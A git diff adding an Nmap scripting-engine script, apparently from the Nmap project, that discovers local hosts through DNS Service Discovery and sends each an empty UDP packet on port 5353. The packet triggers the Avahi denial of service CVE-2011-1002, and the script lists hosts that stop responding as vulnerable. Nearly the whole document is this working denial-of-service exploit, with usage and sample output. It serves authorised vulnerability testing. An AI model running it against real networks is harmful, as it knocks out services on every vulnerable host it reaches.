diff options
Diffstat (limited to '')
-rw-r--r-- | scripts/broadcast-avahi-dos.nse | 108 |
1 files changed, 108 insertions, 0 deletions
diff --git a/scripts/broadcast-avahi-dos.nse b/scripts/broadcast-avahi-dos.nse new file mode 100644 index 0000000..34f25dd --- /dev/null +++ b/scripts/broadcast-avahi-dos.nse @@ -0,0 +1,108 @@ +local dnssd = require "dnssd" +local nmap = require "nmap" +local stdnse = require "stdnse" +local table = require "table" + +description=[[ +Attempts to discover hosts in the local network using the DNS Service +Discovery protocol and sends a NULL UDP packet to each host to test +if it is vulnerable to the Avahi NULL UDP packet denial of service +(CVE-2011-1002). + +The <code>broadcast-avahi-dos.wait</code> script argument specifies how +many number of seconds to wait before a new attempt of host discovery. +Each host who does not respond to this second attempt will be considered +vulnerable. + +Reference: +* http://avahi.org/ticket/325 +* http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1002 +]] + + +--- +-- @usage +-- nmap --script=broadcast-avahi-dos +-- +-- @output +-- | broadcast-avahi-dos: +-- | Discovered hosts: +-- | 10.0.1.150 +-- | 10.0.1.151 +-- | After NULL UDP avahi packet DoS (CVE-2011-1002). +-- | Hosts that seem down (vulnerable): +-- |_ 10.0.1.151 +-- +-- @args broadcast-avahi-dos.wait Wait time in seconds before executing +-- the check, the default value is 20 seconds. + + +author = "Djalal Harouni" +license = "Same as Nmap--See https://nmap.org/book/man-legal.html" +categories = {"broadcast", "dos", "intrusive", "vuln"} + + +prerule = function() return true end + +avahi_send_null_udp = function(ip) + local socket = nmap.new_socket("udp") + local status = socket:sendto(ip, 5353, "") + socket:close() + return status +end + +action = function() + local wtime = stdnse.get_script_args("broadcast-avahi-dos.wait") or 20 + local helper = dnssd.Helper:new() + helper:setMulticast(true) + + local status, result = helper:queryServices() + if (status) then + local output, hosts, tmp = {}, {}, {} + for _, hostcfg in pairs(result) do + for k, ip in pairs(hostcfg) do + if type(k) == "string" and k == "name" then + if avahi_send_null_udp(ip) then + table.insert(hosts, ip) + tmp[ip] = true + end + end + end + end + + if next(hosts) then + hosts.name = "Discovered hosts:" + table.insert(output, hosts) + table.insert(output, + "After NULL UDP avahi packet DoS (CVE-2011-1002).") + + stdnse.debug3("sleeping for %d seconds", wtime) + stdnse.sleep(wtime) + -- try to re-discover hosts + status, result = helper:queryServices() + if (status) then + for _, hostcfg in pairs(result) do + for k, ip in pairs(hostcfg) do + if type(k) == "string" and k == "name" and tmp[ip] then + tmp[ip] = nil + end + end + end + end + + local vulns = {} + for ip, _ in pairs(tmp) do + table.insert(vulns, ip) + end + + if next(vulns) then + vulns.name = "Hosts that seem down (vulnerable):" + table.insert(output, vulns) + else + table.insert(output, "Hosts are all up (not vulnerable).") + end + + return stdnse.format_output(true, output) + end + end +end |